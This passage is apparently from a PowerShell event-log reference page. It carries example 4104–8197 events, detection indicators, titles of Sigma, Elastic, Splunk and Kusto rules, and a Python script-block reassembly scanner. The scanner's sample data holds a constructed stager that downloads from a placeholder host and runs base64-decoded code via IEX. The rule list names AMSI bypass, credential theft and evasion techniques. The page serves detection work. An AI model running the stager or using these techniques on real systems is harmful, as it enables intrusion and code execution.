},
"event_data": {
"MessageNumber": "1",
"MessageTotal": "1",
"ScriptBlockText": "Export-XmlVrecEvents -Channel 'Microsoft-Windows-LSA/Operational' -Max 8000",
"ScriptBlockId": "f8e011c2-f02d-4ac3-9cd6-a7d76a3309eb",
"Path": ""
},
"message": "Creating Scriptblock text (1 of 1):\r\nExport-XmlVrecEvents -Channel 'Microsoft-Windows-LSA/Operational' -Max 8000\r\n\r\nScriptBlock ID: f8e011c2-f02d-4ac3-9cd6-a7d76a3309eb\r\nPath: "
}
Detection Patterns #
132 rules
Sigma
Common Indicators #
Field/value combinations most frequently checked by detection rules targeting this event, derived from cross-vendor predicate analysis.
| Field | Kind | Value | Rules | Vendors |
|---|---|---|---|---|
| ScriptBlockText | contains | new-object | 8 rules | sigma, splunk |
| ScriptBlockText | contains | get-wmiobject | 7 rules | sigma, splunk |
| Esql.script_block_length | gt | 500 | 6 rules | elastic |
| Esql.script_block_pattern_count | ge | 1 | 6 rules | elastic |
| EventData | contains | -itemproperty | 5 rules | sigma |
| Payload | contains | -itemproperty | 5 rules | sigma |
| ScriptBlockText | contains | -itemproperty | 5 rules | sigma |
| file.directory | is_null | | 5 rules | elastic |
| ScriptBlockText | contains | frombase64string | 4 rules | sigma, splunk |
| ScriptBlockText | contains | get-aduser | 4 rules | sigma, splunk |
| ScriptBlockText | contains | invoke-restmethod | 4 rules | sigma, splunk |
| ScriptBlockText | contains | get-childitem | 4 rules | sigma |
| ScriptBlockText | contains | get-netuser | 4 rules | splunk |
| ScriptBlockText | contains | name | 4 rules | sigma |
| ScriptBlockText | eq | *[adsisearcher]* | 4 rules | splunk |
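MessageNumber and MessageTotal matter more than they look: the engine splits a large script block across several 4104 events that share one ScriptBlockId, so a substring indicator such as frombase64string can straddle a fragment boundary and never appear in any single event. The following Python is an added example, not code from this page or from Microsoft: it groups fragments by ScriptBlockId, stitches them in MessageNumber order, reports blocks that are still incomplete, and only then applies the substring and wildcard predicates from the Common Indicators table, plus a length threshold in the spirit of the Elastic script_block_length > 500 predicate and an in-memory flag derived from an empty Path. The script, its split offsets, the ScriptBlockIds and the file path are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample script (not taken from the page): a download-and-decode stager.
SCRIPT = (
    "$wc = New-Object System.Net.WebClient\n"
    "$raw = $wc.DownloadString('http://example.invalid/stage')\n"
    "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($raw)))\n"
)
# Cut the script at arbitrary offsets; 150 deliberately falls inside "FromBase64String"
# so that indicator exists only in the reassembled text, never in a single fragment.
PARTS = [SCRIPT[:80], SCRIPT[80:150], SCRIPT[150:]]

# Made-up ScriptBlockIds for the three blocks in the constructed feed below.
STAGER_ID = "00000000-0000-4000-8000-000000000001"
BENIGN_ID = "00000000-0000-4000-8000-000000000002"
PARTIAL_ID = "00000000-0000-4000-8000-000000000003"


def fragment_event(sbid, number, total, text, path=""):
    """Build a 4104 record in the event_data shape of the example above."""
    return {"event_data": {"MessageNumber": str(number), "MessageTotal": str(total),
                           "ScriptBlockText": text, "ScriptBlockId": sbid, "Path": path}}


# Constructed feed: the stager's fragments arrive out of order (2, 3, 1); a benign
# one-fragment block came from a script file on disk; the last block's second
# fragment never arrived.
EVENTS = [
    fragment_event(STAGER_ID, 2, 3, PARTS[1]),
    fragment_event(BENIGN_ID, 1, 1, "Get-ChildItem C:\\Logs | Measure-Object\n",
                   path="C:\\ops\\count.ps1"),
    fragment_event(STAGER_ID, 3, 3, PARTS[2]),
    fragment_event(PARTIAL_ID, 1, 2, "Get-WmiObject Win32_Process | Where-Object { $_.Name -like "),
    fragment_event(STAGER_ID, 1, 3, PARTS[0]),
]

# Substring predicates from the Common Indicators table, matched case-insensitively,
# and the one wildcard predicate expressed as a regex.
INDICATORS = ("new-object", "get-wmiobject", "-itemproperty", "frombase64string",
              "get-aduser", "invoke-restmethod", "get-childitem", "get-netuser")
ADSI_RE = re.compile(r"\[adsisearcher\]", re.IGNORECASE)


def reassemble(events):
    """Group 4104 fragments by ScriptBlockId and order them by MessageNumber."""
    numbered = defaultdict(dict)
    meta = {}
    for ev in events:
        d = ev["event_data"]
        numbered[d["ScriptBlockId"]][int(d["MessageNumber"])] = d["ScriptBlockText"]
        meta[d["ScriptBlockId"]] = (int(d["MessageTotal"]), d["Path"])
    blocks = {}
    for sbid, frags in numbered.items():
        total, path = meta[sbid]
        order = sorted(frags)
        blocks[sbid] = {
            "parts": [frags[i] for i in order],
            "total": total,
            "path": path,
            "complete": order == list(range(1, total + 1)),
        }
    return blocks


def scan(text):
    """Return the indicators present in text."""
    lowered = text.lower()
    hits = [s for s in INDICATORS if s in lowered]
    if ADSI_RE.search(text):
        hits.append("[adsisearcher]")
    return hits


def analyze_script_blocks(events, long_block=500):
    """Reassemble, then scan whole blocks; keep per-fragment hits to show what is missed."""
    report = {}
    for sbid, b in reassemble(events).items():
        text = "".join(b["parts"])
        fragment_hits = sorted({h for part in b["parts"] for h in scan(part)})
        report[sbid] = {
            "complete": b["complete"],
            "received": len(b["parts"]),
            "total": b["total"],
            "in_memory": b["path"] == "",      # empty Path: block was not loaded from a .ps1
            "long": len(text) > long_block,
            "hits": scan(text) if b["complete"] else fragment_hits,
            "fragment_only_hits": fragment_hits,
            "text": text if b["complete"] else None,
        }
    return report


if __name__ == "__main__":
    for sbid, r in analyze_script_blocks(EVENTS).items():
        state = "complete" if r["complete"] else f'{r["received"]}/{r["total"]}'
        print(sbid, state, r["hits"])
```

Scanning fragments one by one finds new-object but misses frombase64string; only the reassembled text yields both. The benign on-disk block still hits get-childitem, which is why single-cmdlet substrings from the table work better as features combined with Path, block length and host context than as alerts on their own. Incomplete blocks are reported with the hits found in the fragments received so far, so a collector that drops events does not silently hide a block.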
Detection Rules #
Sigma #
- AADInternals PowerShell Cmdlets Execution - PsScript source high: Detects AADInternals cmdlet execution. A tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
- Access to Browser Login Data source medium: Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
- Potential Active Directory Enumeration Using AD Module - PsScript source medium: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration.
(20 of 179 rules shown)
- Powershell Add Name Resolution Policy Table Rule source high: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.
- Add Windows Capability Via PowerShell Script source medium: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
- PowerShell ADRecon Execution source high: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
- AMSI Bypass Pattern Assembly GetType source high: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
- Potential AMSI Bypass Script Using NULL Bits source medium: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
- Silence.EDA Detection source critical: Detects Silence EmpireDNSAgent as described in the Group-IP report
- Get-ADUser Enumeration Using UserAccountControl Flags source medium: Detects AS-REP roasting, an attack that is often overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.
- Potential Data Exfiltration Via Audio File source medium: Detects potential exfiltration attempt via audio file using PowerShell
- Automated Collection Command PowerShell source medium: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
- Windows Screen Capture with CopyFromScreen source medium: Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
- Clear PowerShell History - PowerShell source medium: Detects keywords that could indicate clearing PowerShell history
- Clearing Windows Console History source high: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
- Powershell Create Scheduled Task source medium: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
- Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell source medium: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
- Powershell Install a DLL in System Directory source high: Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
- Registry-Free Process Scope COR_PROFILER source medium: Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)
- PowerShell Create Local User source medium: Detects creation of a local user via PowerShell
Elastic #
- Potential PowerShell Obfuscation via Invalid Escape Sequences source medium: Detects PowerShell scripts with repeated invalid backtick escapes between word characters (letters, digits, underscore, or dash), splitting tokens while preserving execution. Attackers use this obfuscation to fragment keywords and evade pattern-based detection and AMSI.
- Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion source high: Detects PowerShell scripts that use backtick-escaped characters inside ${} variable expansion (multiple backticks between word characters) to reconstruct strings at runtime. Attackers use variable-expansion obfuscation to split keywords, hide commands, and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via Character Array Reconstruction source high: Detects PowerShell scripts that reconstruct strings from char[] arrays, index lookups, or repeated ([char]NN)+ concatenation/join logic. Attackers use character-array reconstruction to hide commands, URLs, or payloads and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation source high: Detects PowerShell scripts that build commands from concatenated string literals inside dynamic invocation constructs like &() or .(). Attackers use concatenated dynamic invocation to obscure execution intent, bypass keyword-based detections, and evade AMSI.
- Potential PowerShell Obfuscation via High Numeric Character Proportion source low: Detects long PowerShell script block content with unusually high numeric character density (high digit-to-length ratio), often produced by byte arrays, character-code reconstruction, or embedded encoded blobs. Attackers use numeric-heavy obfuscation to conceal payloads and rebuild them at runtime to avoid static inspection.
- Potential Dynamic IEX Reconstruction via Environment Variables source medium: Detects PowerShell scripts that reconstruct IEX (Invoke-Expression) by indexing environment variable strings (for example, $env:VAR[1,2,3]) or related .name[...] slices and joining characters at runtime. Attackers use environment-variable slicing to hide dynamic execution and evade keyword-based detections and AMSI.
- Dynamic IEX Reconstruction via Method String Access source low: Detects PowerShell scripts that rebuild IEX by converting method references to strings (for example, ''.IndexOf.ToString()) and extracting multiple indexed characters (for example, [n,n,n]). Attackers use method-string reconstruction to conceal dynamic execution and bypass static detections and AMSI.
- PowerShell Obfuscation via Negative Index String Reversal source low: Detects PowerShell scripts that use negative index ranges (for example, $var[-1..0]) to reverse strings or arrays and rebuild content at runtime. Attackers use index reversal to reconstruct hidden commands or payloads and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via Reverse Keywords source low: Detects PowerShell scripts containing reversed keyword strings associated with execution or network activity (for example, ekovni, noisserpxe, daolnwod, tcejbo-wen, tcejboimw, etc.). Attackers reverse keywords and reconstruct them at runtime to hide intent and evade static detection and AMSI.
- Potential PowerShell Obfuscation via String Concatenation source high: Detects PowerShell scripts that repeatedly concatenate multiple quoted string literals with + to assemble commands or tokens at runtime. Attackers use string concatenation to fragment keywords or URLs and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via String Reordering source medium: Detects PowerShell scripts that use format placeholders like "{0}{1}" with the -f operator or ::Format to reorder strings at runtime. Attackers use format-based reconstruction to hide commands or payload strings and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via Special Character Overuse source medium: Detects PowerShell scripts dominated by whitespace and special characters with low symbol diversity, a profile often produced by formatting or encoding obfuscation. Attackers use symbol-heavy encoding or formatting (for example, SecureString-style blobs or character-level transforms) to hide payloads and evade static analysis and AMSI.
- Potential PowerShell Obfuscation via High Special Character Proportion source low: Identifies PowerShell script block content with an unusually high proportion of non-alphanumeric characters, often produced by encoding, string mangling, or dynamic code generation. Attackers use special-character heavy obfuscation to conceal payloads and hinder static analysis and AMSI.
Splunk #
- AdsiSearcher Account Discovery source: The following analytic detects the use of the [Adsisearcher] type accelerator in PowerShell to query Active Directory for domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify script blocks containing…
- Allow Inbound Traffic In Firewall Rule source: The following analytic detects a suspicious PowerShell command that allows inbound traffic to a specific local port within the public profile. It leverages PowerShell script block logging (EventCode 4104) to identify commands containing…
- Delete ShadowCopy With PowerShell source: The following analytic detects the use of PowerShell to delete shadow copies via the WMIC PowerShell module. It leverages EventCode 4104 and searches for specific keywords like "ShadowCopy," "Delete," or "Remove" within the…
- Detect Certify With PowerShell Script Block Logging source: The following analytic detects the use of the Certify tool via an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. It leverages PowerShell Script Block Logging (EventCode 4104) to…
- Detect Copy of ShadowCopy with Script Block Logging source: The following analytic detects the use of PowerShell commands to copy the SAM, SYSTEM, or SECURITY hives, which are critical for credential theft. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the…
- Detect Empire with PowerShell Script Block Logging source: The following analytic detects suspicious PowerShell execution indicative of PowerShell-Empire activity. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze commands sent to PowerShell, specifically looking…
- Detect Mimikatz With PowerShell Script Block Logging source: The following analytic detects the execution of Mimikatz commands via PowerShell by leveraging PowerShell Script Block Logging (EventCode=4104). This method captures and logs the full command sent to PowerShell, allowing for the…
- Disabled Kerberos Pre-Authentication Discovery With Get-ADUser source: The following analytic detects the execution of the Get-ADUser PowerShell cmdlet with parameters indicating a search for domain accounts with Kerberos Pre-Authentication disabled. It leverages PowerShell Script Block Logging…
- Disabled Kerberos Pre-Authentication Discovery With PowerView source: The following analytic detects the execution of the Get-DomainUser commandlet with the -PreauthNotRequired parameter using PowerShell Script Block Logging (EventCode=4104). This command is part of PowerView, a tool used for enumerating…
- Domain Group Discovery with Adsisearcher source: The following analytic detects the use of the [Adsisearcher] type accelerator in PowerShell to query Active Directory for domain groups. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific script blocks…
- Elevated Group Discovery with PowerView source: The following analytic detects the execution of the Get-DomainGroupMember cmdlet from PowerView, identified through PowerShell Script Block Logging (EventCode=4104). This cmdlet is used to enumerate members of elevated domain groups such…
- Exchange PowerShell Module Usage source: The following analytic detects the usage of specific Exchange PowerShell modules, such as New-MailboxExportRequest, New-ManagementRoleAssignment, New-MailboxSearch, and Get-Recipient. It leverages PowerShell Script Block Logging (EventCode…
- Get ADDefaultDomainPasswordPolicy with Powershell Script Block source: The following analytic detects the execution of the Get-ADDefaultDomainPasswordPolicy PowerShell cmdlet, which is used to retrieve the password policy in a Windows domain. This detection leverages PowerShell Script Block Logging…
- Get ADUser with PowerShell Script Block source: The following analytic detects the execution of the Get-AdUser PowerShell cmdlet, which is used to enumerate all domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify instances where this command is…
- Get ADUserResultantPasswordPolicy with Powershell Script Block source: The following analytic detects the execution of the Get-ADUserResultantPasswordPolicy PowerShell cmdlet, which is used to obtain the password policy in a Windows domain. It leverages PowerShell Script Block Logging (EventCode=4104) to…
- Get DomainPolicy with Powershell Script Block source: The following analytic detects the execution of the Get-DomainPolicy cmdlet using PowerShell Script Block Logging (EventCode=4104). It leverages logs capturing script block text to identify attempts to obtain the password policy in a…
- Get-DomainTrust with PowerShell Script Block source: The following analytic detects the execution of the Get-DomainTrust command from PowerView using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed inspection.…
- Get DomainUser with PowerShell Script Block source: The following analytic detects the execution of the Get-DomainUser cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is part of PowerView, a tool often used for domain enumeration. The detection leverages…
- Get-ForestTrust with PowerShell Script Block source: The following analytic detects the execution of the Get-ForestTrust command from PowerSploit using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility…
- Get WMIObject Group Discovery with Script Block Logging source: The following analytic detects the execution of the Get-WMIObject Win32_Group command using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed analysis.…
Kusto #
- Suspicious Powershell Commandlet Executed source medium: This analytic rule detects when a suspicious PowerShell commandlet is executed on a host. Threat actors often use PowerShell to execute commands and scripts to move laterally, escalate privileges, and exfiltrate data.
References #
Event ID 4105: Started invocation of ScriptBlock ID: ScriptBlockId.
#Description
Started invocation of ScriptBlock ID: ScriptBlockId.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ScriptBlockId | UnicodeString | Started invocation of ScriptBlock ID. |
| RunspaceId | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4105,
"version": 1,
"level": 5,
"task": 102,
"opcode": 15,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9762883+00:00",
"event_record_id": 292345,
"correlation": {
"ActivityID": "{C6821FB2-EF88-0000-CDB8-82C688EFDC01}"
},
"execution": {
"process_id": 4440,
"thread_id": 3676
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ScriptBlockId": "04d49ce2-3f05-45a9-957c-5758c9f59afd",
"RunspaceId": "433997d9-ccc4-4c0d-bc9b-e1f7f9b3ed04"
},
"message": "Started invocation of ScriptBlock ID: 04d49ce2-3f05-45a9-957c-5758c9f59afd\r\nRunspace ID: 433997d9-ccc4-4c0d-bc9b-e1f7f9b3ed04"
}
References #
Event ID 4106: Completed invocation of ScriptBlock ID: ScriptBlockId.
#Description
Completed invocation of ScriptBlock ID: ScriptBlockId.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ScriptBlockId | UnicodeString | Completed invocation of ScriptBlock ID. |
| RunspaceId | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4106,
"version": 1,
"level": 5,
"task": 103,
"opcode": 15,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9776346+00:00",
"event_record_id": 292349,
"correlation": {
"ActivityID": "{C6821FB2-EF88-0006-879F-82C688EFDC01}"
},
"execution": {
"process_id": 4440,
"thread_id": 7812
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ScriptBlockId": "cfd3b61c-5457-44b3-aee3-bbfbd9689340",
"RunspaceId": "b4551755-8da0-496c-9c88-6bf2955ba423"
},
"message": "Completed invocation of ScriptBlock ID: cfd3b61c-5457-44b3-aee3-bbfbd9689340\r\nRunspace ID: b4551755-8da0-496c-9c88-6bf2955ba423"
}
References #
Event ID 7937: ContextInfo Context: Context User Data: User_Data.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ContextInfo | UnicodeString | |
| UserData | UnicodeString | |
| Payload | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 7937,
"version": 1,
"level": 4,
"task": 0,
"opcode": 20,
"keywords": "0x4000000000000020",
"time_created": "2026-06-02T04:29:47.997+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{877F78A1-F053-0003-4D12-848753F0DC01}"
},
"execution": {
"process_id": 7868,
"thread_id": 3636
},
"channel": "ETW Trace",
"computer": "JD-DC01-2022",
"security": {
"user_id": ""
}
},
"event_data": {
"ContextInfo": " Severity = Informational\r\n Host Name = ConsoleHost\r\n Host Version = 5.1.20348.4294\r\n Host ID = 2b5c509a-8716-4b8e-9e7b-d73a2aa98dcd\r\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\Tools\\Sealighter\\drv\\drv04.ps1\r\n Engine Version = 5.1.20348.4294\r\n Runspace ID = 2d8a8c17-0da2-4dfe-a42d-bebe964bcedb\r\n Pipeline ID = 1\r\n Command Name = Start-Job\r\n Command Type = Cmdlet\r\n Script Name = C:\\Tools\\Sealighter\\drv\\drv04.ps1\r\n Command Path = \r\n Sequence Number = 721\r\n User = ludus\\domainadmin\r\n Connected User = \r\n Shell ID = Microsoft.PowerShell\r\n",
"Payload": "Command System.Management.Automation.LogContext is Stopped.\r\n",
"UserData": ""
},
"message": "win:None"
}
Event ID 7938: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ContextInfo | UnicodeString | |
| UserData | UnicodeString | |
| Payload | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
"event_source_name": "",
"event_id": "7938",
"version": "1",
"level": "4",
"task": "100",
"opcode": "20",
"keywords": 0,
"time_created": "2026-03-15T04:33:37.067269800+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{d73f5340-b345-0001-748f-44d745b3dc01}"
},
"execution": {
"process_id": "5820",
"thread_id": "12172"
},
"channel": "Microsoft-Windows-PowerShell/Analytic",
"computer": "",
"security": {
"user_id": ""
}
},
"event_data": {
"ContextInfo": " Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.20348.558\n Host ID = 247af873-a1bf-4dba-9ce9-5140eb54ab09\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\domainadmin\\Desktop\\automaton\\onedrive_etw_capture.ps1 -Action stop\n Engine Version = 5.1.20348.558\n Runspace ID = 83d77211-d444-44c5-9530-51739db0c2f4\n Pipeline ID = \n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 14\n User = ludus\\domainadmin\n Connected User = \n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Engine state changed from None to Available.\n"
},
"message": ""
}
Event ID 7939: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ContextInfo | UnicodeString | |
| UserData | UnicodeString | |
| Payload | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
"event_source_name": "",
"event_id": "7939",
"version": "1",
"level": "4",
"task": "104",
"opcode": "20",
"keywords": 0,
"time_created": "2026-03-15T04:33:36.400594000+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{d73f5340-b345-0001-748f-44d745b3dc01}"
},
"execution": {
"process_id": "5820",
"thread_id": "8064"
},
"channel": "Microsoft-Windows-PowerShell/Analytic",
"computer": "",
"security": {
"user_id": ""
}
},
"event_data": {
"ContextInfo": " Severity = Informational\n Host Name = ConsoleHost\n Host Version = 5.1.20348.558\n Host ID = 247af873-a1bf-4dba-9ce9-5140eb54ab09\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\domainadmin\\Desktop\\automaton\\onedrive_etw_capture.ps1 -Action stop\n Engine Version = \n Runspace ID = \n Pipeline ID = \n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 2\n User = ludus\\domainadmin\n Connected User = \n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Provider Registry changed state to Started.\n"
},
"message": ""
}
Event ID 7940: ContextInfo Context: Context User Data: User_Data.
Event ID 7941: Correlating activity id's.
Event ID 7942: Class Name = ClassName.
#Description
Class Name = ClassName.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ClassName | UnicodeString | |
| MethodName | UnicodeString | |
| WorkflowGuid | UnicodeString | |
| Message | UnicodeString | |
| JobData | UnicodeString | |
| ActivityName | UnicodeString | |
| ActivityGuid | UnicodeString | |
| Parameters | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
"event_source_name": "",
"event_id": "7942",
"version": "1",
"level": "5",
"task": "0",
"opcode": "20",
"keywords": 0,
"time_created": "2026-03-15T04:33:36.215006100+00:00",
"event_record_id": 0,
"correlation": {
"ActivityID": "{d73f5340-b345-0001-748f-44d745b3dc01}"
},
"execution": {
"process_id": "5820",
"thread_id": "12008"
},
"channel": "Microsoft-Windows-PowerShell/Analytic",
"computer": "",
"security": {
"user_id": ""
}
},
"event_data": {
"ClassName": "RemoteSessionNamedPipeServer",
"MethodName": "StartListening",
"WorkflowGuid": "00000000-0000-0000-0000-000000000000",
"Message": "Listener thread started on Process 5820 in AppDomainName DefaultAppDomain.",
"JobData": "",
"ActivityName": "",
"ActivityGuid": "",
"Parameters": ""
},
"message": ""
}
Event ID 8193: Creating Runspace object Instance Id.
#Description
Creating Runspace object.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| param1 | | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8193,
"version": 1,
"level": 5,
"task": 1,
"opcode": 16,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.2119349+00:00",
"event_record_id": 292217,
"correlation": {
"ActivityID": "{423FC9FF-BB95-4958-9E72-EC0DE8F5F539}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"param1": "423fc9ff-bb95-4958-9e72-ec0de8f5f539"
},
"message": "Creating Runspace object \r\n \t Instance Id: 423fc9ff-bb95-4958-9e72-ec0de8f5f539"
}
Event ID 8194: Creating RunspacePool object.
#Description
Creating RunspacePool object.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| InstanceId | UnicodeString | |
| MaxRunspaces | UnicodeString | |
| MinRunspaces | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8194,
"version": 1,
"level": 5,
"task": 1,
"opcode": 16,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.2119503+00:00",
"event_record_id": 292218,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"InstanceId": "93b2b5d3-ad4a-47fd-88fe-256547248572",
"MaxRunspaces": "1",
"MinRunspaces": "1"
},
"message": "Creating RunspacePool object \r\n \t InstanceId 93b2b5d3-ad4a-47fd-88fe-256547248572 \r\n \t MinRunspaces 1 \r\n \t MaxRunspaces 1"
}
Event ID 8195: Opening RunspacePool
#Description
Opening RunspacePool.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| async)_V1( | | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8195,
"version": 1,
"level": 5,
"task": 1,
"opcode": 10,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.2121570+00:00",
"event_record_id": 292219,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "Opening RunspacePool"
}
Event ID 8196: Modifying activity Id and correlating
#Description
Modifying activity Id and correlating.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| async)8196_V1( | | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 8196,
"version": 1,
"level": 4,
"task": 0,
"opcode": 20,
"keywords": 0,
"time_created": "2026-06-13T14:36:52.9782661+00:00",
"event_record_id": 292350,
"correlation": {
"ActivityID": "{93B2B5D3-AD4A-47FD-88FE-256547248572}"
},
"execution": {
"process_id": 1152,
"thread_id": 1496
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {},
"message": "Modifying activity Id and correlating"
}
Event ID 8197: Runspace state changed to param1.
#Description
Runspace state changed to param1.
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| param1 | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "A0C1853B-5C40-4B15-8766-3CF1C58F985A",
"event_source_name": "",
"event_id": 8197,
"version": 1,
"level": 5,
"task": 1,
"opcode": 10,
"keywords": 0,
"time_created": "2026-03-13T19:06:18.830885+00:00",
"event_record_id": 451785,
"correlation": {
